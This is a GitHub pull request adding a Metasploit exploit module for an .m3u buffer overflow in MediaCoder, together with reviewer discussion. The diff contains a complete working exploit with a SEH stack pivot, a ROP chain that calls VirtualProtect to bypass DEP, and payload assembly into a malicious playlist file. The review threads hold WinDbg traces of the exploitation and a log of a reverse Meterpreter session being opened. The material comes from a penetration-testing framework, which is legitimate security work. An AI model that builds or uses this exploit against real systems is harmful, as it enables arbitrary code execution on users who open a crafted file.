Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added MediaCoder exploit module #2081

Merged
merged 7 commits into from
Jul 12, 2013
Merged

Added MediaCoder exploit module #2081

Changes from 2 commits
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
b8354d3
Added MediaCoder exploit module
modpr0be Jul 6, 2013
23d2bfc
add more author
modpr0be Jul 6, 2013
ecb2667
remove seh mixin and fix the rop nop address
modpr0be Jul 6, 2013
ed6d88a
credit to mona.py for rop
modpr0be Jul 7, 2013
b2a18c3
add dll references for rop
modpr0be Jul 8, 2013
8de88cb
change target from win7 sp1 to win7 sp0, fix description
modpr0be Jul 10, 2013
16c9eff
make msftidy happy
modpr0be Jul 10, 2013
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
123 changes: 123 additions & 0 deletions modules/exploits/windows/fileformat/mediacoder_m3u.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,123 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this mixin used? If isn't used the include should be deleted.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Of course, I missed that one. Will be removed on next commit.


def initialize(info = {})
super(update_info(info,
'Name' => 'MediaCoder .M3U Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in MediaCoder 0.8.23. The vulnerability
occurs when adding an .m3u, allowing arbitrary code execution under the context
of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder
runs with DEP. This module has been tested successfully on MediaCoder 0.8.23.5530
over Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

A comma is needed at the end of entry

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Strange, msftidy doesn't complain about it. Will add it on next commit.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-)

'otoy <otoy[at]spentera.com>' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '94522' ],
[ 'EDB', '26403' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 1200,
'BadChars' => "\x00\x5c\x40\x0d\x0a",
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

  • Testing with MediaCoder-0.8.23.5530.exe: Doesn't work, neither crash.
  • Testing with MediaCoder-0.8.22.5525.exe: crashes but doesn't work.

Generated test case:

msf exploit(mediacoder_m3u) > show options

Module options (exploit/windows/fileformat/mediacoder_m3u):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.m3u          no        The file name.


Exploit target:

   Id  Name
   --  ----
   0   MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1


msf exploit(mediacoder_m3u) > set payload windows/exec 
payload => windows/exec
msf exploit(mediacoder_m3u) > set CMD calc.exe
CMD => calc.exe
msf exploit(mediacoder_m3u) > rexploit
[*] Reloading module...

[+] msf.m3u stored at /.msf4/local/msf.m3u
  • Crash:
(ec8.330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
eax=000000fe ebx=7734ad60 ecx=0797b808 edx=f87b47f8 esi=005308c8 edi=000f00ac
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1f3706c9
  • Getting EIP:
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1f3706c9
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
  • Executing the stackpivot until the ret:
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd443b esp=0012f304 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd443c esp=0012f308 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=00000000
eip=6afd443d esp=0012f30c ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=6afd443e esp=0012f310 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=6afd443f esp=0012f314 ebp=ad31736a iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
  • The stack at the stackpivot's ret:
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=6afd443f esp=0012f314 ebp=ad31736a iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd /c1 esp
0012f314  5de29993
0012f318  5fb9d72c
0012f31c  bd821ff1
0012f320  7aaa1222
0012f324  f92b2044
0012f328  4218abda
0012f32c  a76aa3cf
0012f330  83d36f84
0012f334  cc5fbabf
0012f338  51a86dea
0012f33c  85a51ec5
0012f340  4a55d641
0012f344  c13dd08a
0012f348  fc97282e
0012f34c  db2923b9
0012f350  8e1a2cae
0012f354  19fdcda6
0012f358  6d93c249
0012f35c  13cad546
0012f360  05bb4a23
0012f364  87968c30
0012f368  18420f0c
0012f36c  beda55c4
0012f370  50be2c1b
0012f374  a6f02bce
0012f378  6aa8f1b4
0012f37c  da5aff8c
0012f380  bd3ee016
0012f384  9b8f49c2
0012f388  2e07cbab
0012f38c  98d768b0
0012f390  e9e19506
  • Finally crash when ret into 5de29993
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=5de29993 esp=0012f318 ebp=ad31736a iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
5de29993 ??              ???

So:

  • Looks like the MediaCoder version in the target name isn't accurate. Shouldn't be 0.8.23.5530 but 0.8.22.5525. Is it a typo?
  • ESP after the stackpivot doesn't point to the rop chain, alignment problem?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hmm strange, I can confirm that this works for me from 0.8.22.5525 - 0.8.23.5530. Both tested across VM and physical box.

MediaCoder 0.8.22.5525 - 0.8.23.5530 on Windows 7 SP1 (Physical Box)

(1218.be4): Break instruction exception - code 80000003 (first chance)
eax=7ff9e000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=06b1ff5c ebp=06b1ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc              int     3
0:029> g
(1218.1618): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000093 ebx=7577ad60 ecx=04d34c88 edx=fb3fb378 esi=005308c8 edi=000307d0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1b765fa5
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd /c1 esp
0012f464  6ab16202
0012f468  6ab16202
0012f46c  6ab16202
0012f470  6ab16202
0012f474  6ab16202
0012f478  6ab16202
0012f47c  6ab16202
0012f480  6ab16202
0012f484  6ab16202
0012f488  100482ff
0012f48c  ffffffc0
0012f490  7a69494a
0012f494  66d9d9ba
0012f498  6ab2241d
0012f49c  44716254
0012f4a0  44716254
0012f4a4  44716254
0012f4a8  44716254
0012f4ac  44716254
0012f4b0  44716254
0012f4b4  44716254
0012f4b8  44716254
0012f4bc  44716254
0012f4c0  44716254
0012f4c4  44716254
0012f4c8  44716254
0012f4cc  44716254
0012f4d0  44716254
0012f4d4  44716254
0012f4d8  1004a8ee
0012f4dc  6ab561b0
0012f4e0  66d9feee

in handler:

msf exploit(handler) > exploit 

[*] Started reverse handler on 10.10.10.10:443 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.10.10.11
[*] Meterpreter session 1 opened (10.10.10.10:443 -> 10.10.10.11:1934) at 2013-07-09 02:01:29 +0700

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter > quit

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hmm, not working for me on Win 7 SP1 either. (windows/exec payload):

0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1636203a
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd443b esp=0012f304 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd443c esp=0012f308 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=00000000
eip=6afd443d esp=0012f30c ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=e4f88e0c
eip=6afd443e esp=0012f310 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=e4f88e0c
eip=6afd443f esp=0012f314 ebp=597a7252 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=e4f88e0c
eip=c9e42ce2 esp=0012f318 ebp=597a7252 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
c9e42ce2 ??              ???

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Strange, works for me with windows/exec payload too.

(88c.10a4): Break instruction exception - code 80000003 (first chance)
eax=7ffdb000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=02ccff5c ebp=02ccff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc              int     3
0:028> g
(88c.1404): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000bd ebx=7577ad60 ecx=04e4d968 edx=fb2e2698 esi=005308c8 edi=000f05c0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll - 
0:000> !exdhain
No export exdhain found
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3              ret
0:000> dd /c1 esp
0012f464  6ab16202
0012f468  6ab16202
0012f46c  6ab16202
0012f470  6ab16202
0012f474  6ab16202
0012f478  6ab16202
0012f47c  6ab16202
0012f480  6ab16202
0012f484  6ab16202
0012f488  100482ff
0012f48c  ffffffc0
0012f490  6970504f
0012f494  66d9d9ba
0012f498  6ab2241d
0012f49c  7a784c49
0012f4a0  7a784c49
0012f4a4  7a784c49
0012f4a8  7a784c49
0012f4ac  7a784c49
0012f4b0  7a784c49
0012f4b4  7a784c49
0012f4b8  7a784c49
0012f4bc  7a784c49
0012f4c0  7a784c49
0012f4c4  7a784c49
0012f4c8  7a784c49
0012f4cc  7a784c49
0012f4d0  7a784c49
0012f4d4  7a784c49
0012f4d8  1004cc03
0012f4dc  6ab561b0
0012f4e0  66d9feee

I've tested it with 0.8.22.5525 and 0.8.23.5530:

0:000> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder C (no symbols)           
    Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Mon Jun 17 23:30:07 2013 (51BF398F)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 22, 5525
    FileVersion:      0, 8, 22, 5525
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com

{
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ideally you want to print which DLL this address belongs to, better documentation :-)

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Noted.

'Offset' => 849,
'Max' => 5000
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 24, 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
], self.class)

end

def junk(n=1)
return [rand_text_alpha(4).unpack("L")[0]] * n
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why is the random text repeated n times instead of generating different junk by calling rand_text_alpha(4).unpack("L")[0] n times? That would make the exploit's junk code more random when n > 1.

end

def nops(rop=false, n=1)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Isn't this redundant with Msf::Exploit#make_nops?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

No, it isn't, allow ROP compatible nops, which make_nops doesn't allow. But this function should use make_nops when rop is false. The problem is with the semantics, when asking for 1 nop with rop == false, indeed he is trying to do make_nops(4).

return rop ? [0x6ab21799] * n : [0x90909090] * n
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I guess this gadget (ret gadget at 0x6ab21799? ) is target specific (MediaCoder 0.8.23.5530 in this case). If it's the case, should be on the target metadata.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes you're correct. I'll change it to 0x6ab16202 from swscale-2.dll, that would be universal I think..

end

def exploit

rop_gadgets =
[
nops(true,35), # ROP NOP
0x100482ff, # POP EAX # POP EBP # RETN
0xffffffc0, # negate will become 0x00000040
junk,
0x66d9d9ba, # NEG EAX # RETN
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
junk(15), # reserve more junk for add esp,2c
0x1004a8ee, # POP ECX # RETN
0x6ab561b0, # ptr to &VirtualProtect()
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN
0x6ab19780, # XCHG EAX,ESI # RETN
0x66d929f5, # POP EAX # POP EBX # RETN
0xfffffcc0, # negate will become 0x0000033f
junk,
0x6ab3c65a, # NEG EAX # RETN
0x1004cc03, # POP ECX # RETN
0xffffffff, #
0x660166e9, # INC ECX # SUB AL,0EB # RETN
0x66d8ae48, # XCHG ECX,EBX # RETN
0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Which DLL is this? Looks like this ROP chain uses multiple DLLs?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Noted. Will add all rop DLL info.

0x6ab3d688, # POP ECX # RETN
0x6ab4ead0, # Writable address
0x100444e3, # POP EDI # RETN
nops(true), # ROP NOP
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why use a nops instead of make_nops?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Because of ROP compatible nops, which aren't supported by make_nops.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

A ROP NOP is typically an address to a RET instruction. The make_nops() function generates something that replaces 0x90. Two different things.

0x10048377, # POP EAX # POP EBP # RETN
nops, # Regular NOPs
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Are these nops really needed?

0x6ab01c06, # PUSH ESP# RETN
0x6ab28dda, # PUSHAD # RETN
].flatten.pack("V*")

sploit = "http://"
sploit << rand_text(target['Offset'])
sploit << [target.ret].pack('V')
sploit << rop_gadgets
sploit << make_nops(16)
sploit << payload.encoded
sploit << rand_text(target['Max']-sploit.length)

file_create(sploit)
end
end